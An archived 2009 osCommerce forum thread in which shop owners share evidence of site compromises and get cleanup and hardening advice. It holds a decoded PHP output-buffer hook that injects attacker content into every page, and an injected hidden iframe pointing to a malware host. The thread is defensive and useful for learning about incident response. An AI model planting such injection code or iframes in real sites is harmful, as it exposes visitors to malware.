spooks Posted September 15, 2009 Author Share Posted September 15, 2009 My last post here shows how to prevent this, see http://www.oscommerce.com/forums/index.php?sho...c=344272&hl= for details on this nasty hack, I hope u have a site backup!! Decodes to: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php')){include_once('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}} Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
Jayman11 Posted September 15, 2009 Share Posted September 15, 2009 Thanks Sam. I have one, unfortunately it may be out of date so I don't want to move it over. Right now I am going through the files 1 by 1 and removing the code. Now I just need to figure out which an where the files are that it put on that need to be deleted. Guess I need to delete the filename php to preven this from happening again. Link to comment Share on other sites More sharing options...
spooks Posted September 15, 2009 Author Share Posted September 15, 2009 Guess I need to delete the filename php to preven this from happening again. Its file_manager.php that u must delete !!! :huh: Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
Jayman11 Posted September 15, 2009 Share Posted September 15, 2009 Lol that's what I meant. Link to comment Share on other sites More sharing options...
cyberlaban Posted September 17, 2009 Share Posted September 17, 2009 Hi, I have installed several of the security settings that has been recomended in this topic to my shop, I also belived that I had done enough testing but when addin a new product (something I had not tested), the product infomation link (to an external page) woun't work. when pushing on the link to "product information" you get redirected to the index page. Anyone who have an idè on how to solve this? All help really appriciated. The security settings I have implemented is: Folders Security pro Renaming admin IP trap .htaccess Brg Espen Link to comment Share on other sites More sharing options...
swguy Posted September 20, 2009 Share Posted September 20, 2009 I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026 Contributions: Better Together and Quantity Discounts for osCommerce 2.3.x and Phoenix. See my profile for more details. Link to comment Share on other sites More sharing options...
♥FIMBLE Posted September 20, 2009 Share Posted September 20, 2009 I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026 I tried out your script, nice try but i feel personally it is too confusing for the newer users who will be lead to believe that they have a have when none exists. Too many warnings about eval, perhaps you should add a list of files known to use this? Good work though Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
swguy Posted September 20, 2009 Share Posted September 20, 2009 There is a list of files known to use eval - they're files from the default installation. See line 29 in admin/syscheck.php and add what you need. Contributions: Better Together and Quantity Discounts for osCommerce 2.3.x and Phoenix. See my profile for more details. Link to comment Share on other sites More sharing options...
blr044 Posted September 21, 2009 Share Posted September 21, 2009 I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026 In your instruction, you made this statement: Try this in a test environment prior to installing it on a live shop. I have seen orther mod suggest the same thing. So am asking, how is this done, do we need to contact our host to have this done? Thanks. Bennett Link to comment Share on other sites More sharing options...
spooks Posted September 21, 2009 Author Share Posted September 21, 2009 test environment, how is this done, do we need to contact our host to have this done? It simply means set up a duplicate site eleswhere purly for testing, it can be with a seperate domain, or, most simply, within a subdirectory of your site, then it can share the same dbase if u want. If installing within a subdirectory do not run the installer, as that will delete your existing dbase, just copy files & set up configure.php, filenames.php etc files manually. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
cyberlaban Posted September 21, 2009 Share Posted September 21, 2009 Hi All, I find it strange that no one has experienced the same problem as me when coming to being redirected to index page when clicking on the "more product information" link.... guess I just tweeked the security settings to hard.... But if anyone has an idè on how to solve it I'll listen :) Cheers Espen This is what I have done: I have installed several of the security settings that has been recomended in this topic to my shop, I also belived that I had done enough testing but when addin a new product (something I had not tested), the product infomation link (to an external page) woun't work. when pushing on the link to "product information" you get redirected to the index page. Anyone who have an idè on how to solve this? All help really appriciated. The security settings I have implemented is: Folders Security pro Renaming admin IP trap .htaccess Link to comment Share on other sites More sharing options...
spooks Posted September 21, 2009 Author Share Posted September 21, 2009 Your error is not related to security, & likely nothing to do with any of the contribs u added. Likely u created a cooinsidental error, your error is typical of many badly coded termplates. Create a new thread with error & code plus link to faulty page. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
mycommerce2 Posted September 22, 2009 Share Posted September 22, 2009 I just install eoCommerce 2.2 RC2 and every thing look good. I'm very new at this. I read yourpost here, about securing your site. Although this tells me WHAT I need to do, I'm not sure HOW to do it. With my host (Just Host) know how to go into File Manager and see may folders and files, but I don't have a clue on where to start to implement the security measure(s) in the link I cite above. Can some one tell me HOW (what coding do I need to add or modify) and in WHICH files do I need to add or modify coding. How do I access these files. Do I need to implement ALL of the security measures at the link above? Please give me as much detail as you can for each question. I really appreciate your help. Link to comment Share on other sites More sharing options...
cyberlaban Posted September 22, 2009 Share Posted September 22, 2009 Your error is not related to security, & likely nothing to do with any of the contribs u added. Likely u created a cooinsidental error, your error is typical of many badly coded termplates. Create a new thread with error & code plus link to faulty page. Thanks for the feedback. I will post a new tread with link etc. The only thing I have done besides adding the security settings is a Norwegian language pack and added payment module. Could it be the Norwegian language pack then??? I was so sure that it had something to do with the security settings... Cheers Espen Link to comment Share on other sites More sharing options...
spooks Posted September 22, 2009 Author Share Posted September 22, 2009 They are all contributions, you just follow the instructions!! How do I install a contribution http://www.oscommerce.com/forums/index.php?sho...=0#entry1432157 Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
pretzi Posted September 30, 2009 Share Posted September 30, 2009 Sam, you´re doing a GREAT JOB, but-Oh, boy, this is going to be quite of an afternoon-I can sence all this like a "yor site will be bulletproof but will cease to run" kind of thing. I´m expecting tones of "Fatal errors", blank pages...you name it. Hope not. Can you, please, tell any posible conflicts- with PayPal for exemple. Thanks! Link to comment Share on other sites More sharing options...
spooks Posted September 30, 2009 Author Share Posted September 30, 2009 any posible conflicts There should be no conflicts with most, refer to relevent support threads for each. Some, like security pro, have inbuilt measures to avoid conflicts. :) Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
Guest Posted October 10, 2009 Share Posted October 10, 2009 Sorry if this is OT. Is yacybot a bonafide spider? Got three http errors in a row from different ips. Eg below Site: http://xxxxx Error Code: 400 - The request could not be understood by the server due to malformed syntax. Occurred: 10/11/2009 1:12:40 Requested URL: http://xxxxxx/mod_ssl:error:HTTP-request User Address: xxx.xx.xx.xx User Agent: yacybot (amd64 Linux 2.6.28-15-generic; java 1.6.0_0; Europe/en) http://yacy.net/bot.html Referer: http://xxxxx:443/ Link to comment Share on other sites More sharing options...
spooks Posted October 10, 2009 Author Share Posted October 10, 2009 Is yacybot a bonafide spider? Does this help? yacy.net/bot.html Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
madstarr Posted October 12, 2009 Share Posted October 12, 2009 Please help identify hack. This morning my osc site had an error on the main index page Parse error: syntax error, unexpected $end in /data/13/1/102/19/1265997/user/1350825/htdocs/msrparts_com/sfmparts/index.php on line 384 When I FTP into the site I see that a new index.php had been replaced this weekend. I am theoretically the only one with access to the osc site or the ftp site. Can anybody give me insight as to how this may have happened and if there is a way to find out when, how, or where from this file came. I am assuming that the filemanager may be an issue as discussed in this thread and am making attempts to put in place the suggested security measures. Thank you. Link to comment Share on other sites More sharing options...
spooks Posted October 12, 2009 Author Share Posted October 12, 2009 Please help identify hack. This morning my osc site had an error on the main index page Parse error: syntax error..... Its impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!! If u find new code on the page that has led to this, posting that alien code would be more useful. Apply all security advised & throughly check your site. Of course making backups as well, if not already done, is essential. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
madstarr Posted October 12, 2009 Share Posted October 12, 2009 Its impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!! If u find new code on the page that has led to this, posting that alien code would be more useful. Apply all security advised & throughly check your site. Of course making backups as well, if not already done, is essential. Thank you Sam. Part of my concern is that I have not worked on this site in several weeks and the index.php file that was on the server was updated or uploaded October 10. That is why i am trying to figure out how this could have happened. I compared the file that was uploaded with the one that I uploaded on 09/23 The only difference is on Line 55 the original 09/23 reads: </head> <body> <!-- header //--> <?php $tab_sel = 2; ?> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //--> and the one from 10/10 </head> <body><div style="display:none">imoobdtmglzyfqfzsftbgwbpkcgwnef<iframe width=274 height=708 src="http : // your-bio . ru : 8080 / index.php" ></iframe></div> <!-- header //--> <?php $tab_sel = 2; ?> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //--> Also in the 10/10 version of index.php the last lines of the code have been deleted. from <!-- right_navigation //--> on is no longer there. </td> <td class="<?php echo BOX_WIDTH_TD_RIGHT; ?>"><table border="0" class="<?php echo BOX_WIDTH_RIGHT; ?>" cellspacing="0" cellpadding="0"> <!-- right_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_right.php'); ?> <!-- right_navigation_eof //--> </table> </td> </tr> </table> </td> <?php } ?> </tr> </table> <!-- body_eof //--> <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?> Thank you in advance for your assistance. And please excuse my amateur knowledge. Link to comment Share on other sites More sharing options...
spooks Posted October 12, 2009 Author Share Posted October 12, 2009 <iframe > http: // your - bio. ru: 8080 / index . php Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes. I can't find to much on the hack in question, other than google reports that the target contains viri, fortunatly the error caused means no-one will have seen the page. Check all your files & look for added ones, esp in images folder Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors. Its likely many files effected, you may also have hidden files added that u cant remove, best get host to wipe site & restore with your backup, then add security. Also note the better hosts keep daily backups, some don't charge for a restore either. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
madstarr Posted October 12, 2009 Share Posted October 12, 2009 Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes. I can't find to much on the hack in question, other than google reports that the target contains viri, fortunatly the error caused means no-one will have seen the page. Check all your files & look for added ones, esp in images folder Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors. Its likely many files effected, you may also have hidden files added that u cant remove, best get host to wipe site & restore with your backup, then add security. Also note the better hosts keep daily backups, some don't charge for a restore either. Thank you very much for your help. I am getting my files restored right now. I believed that this was the problem. In your opinion was this done through the file manager vulnerability you discussed? Thanks again Link to comment Share on other sites More sharing options...
Guest Posted October 13, 2009 Share Posted October 13, 2009 Does this help? yacy.net/bot.html Yeah read that before I posted. It says it is a robot and obeys robots.txt, but if it did it would not get the http://xxxxxx/mod_ss...or:HTTP-request error. Anyway, it doen't matter. I stopped in htaccess. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.